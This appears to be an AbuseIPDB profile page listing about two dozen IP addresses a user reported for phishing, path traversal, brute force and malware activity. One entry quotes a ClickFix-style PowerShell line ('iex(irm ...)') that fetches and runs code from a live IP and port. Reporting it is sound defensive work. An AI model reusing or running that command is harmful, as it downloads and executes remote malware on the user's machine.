User HittSec joined AbuseIPDB in April 2025 and has reported 32 IP addresses.
Standing (weight) is good.
ACTIVE USER
| IP | Date | Comment | Categories |
|---|---|---|---|
| ๐ธ๐ช 171.25.193.37 |
WAF Path Traversal.
|
Hacking | |
| ๐บ๐ธ 2a01:111:f403:c10c::1 |
Malicious sender associated: yforbush@govenetian[.]com
|
Phishing | |
| ๐ฎ๐ฑ 91.90.142.7 |
Code Injection Attempt
|
Web App Attack | |
| ๐บ๐ธ 204.194.54.240 |
Path Traversal
|
Web App Attack | |
| ๐ธ๐ช 45.84.107.172 |
Path Traversal
|
Web App Attack | |
| ๐บ๐ธ 2607:f8b0:4864:20::b12a |
Email phish, via broken zoom link to coax user to download separate(malicious) version
|
Phishing | |
| ๐ฉ๐ช 94.26.90.111 |
CLICKFIX style code put into RunMRU: powershell -c "iex(irm '94.26.90.111:6602' -UseBasicParsing)
|
Hacking | |
| ๐บ๐ธ 185.199.109.153 |
Associated with old phish github repo >
hxxps[:]//ejeong12[.]github[.]io
|
Phishing | |
| ๐บ๐ธ 23.11.33.159 |
Data exfil related to seheq malware.
|
Hacking | |
| ๐จ๐ณ 119.249.100.116 |
|
Port Scan | |
| ๐บ๐ธ 2a01:111:f403:c105::5 |
Malicious email with link to malware hosting site.
|
Phishing Email Spam | |
| ๐บ๐ธ 89.249.192.114 |
Unauthorized access attempt.
|
Brute-Force | |
| ๐บ๐ธ 188.114.96.3 |
|
DNS Compromise | |
| ๐ธ๐ช 185.41.148.1 |
Phish email
URL: โhxxps[://]cover-canvas-charm[.]lovable[.]app"
|
Phishing | |
| ๐บ๐ธ 209.85.210.179 |
|
Email Spam | |
| ๐ฆ๐บ 203.96.177.124 |
IP involved in multistage malware event involving redirects via malicious software "pdfeditor"
|
Hacking | |
| ๐ฎ๐น 78.159.206.23 |
Password spray attempts, Codes: 50,126.
|
Brute-Force | |
| ๐บ๐ธ 74.208.4.197 |
|
Phishing | |
| ๐บ๐ธ 170.203.26.213 |
Impersonating header (Matt @ Breeze" <[email protected]>)
Phishing email, confirmed.
|
Phishing | |
| ๐ฉ๐ช 3.68.51.202 |
|
Phishing | |
| ๐ญ๐ฐ 45.38.42.81 |
|
Exploited Host | |
| ๐ฉ๐ช 80.75.212.83 |
|
Hacking | |
| ๐บ๐ธ 54.240.8.42 |
|
Phishing | |
| ๐ฎ๐ณ 106.216.198.247 |
Authentication failure spray.
|
Brute-Force | |
| ๐บ๐ธ 173.244.56.178 |
Brute force against Globa Protect
|
Brute-Force |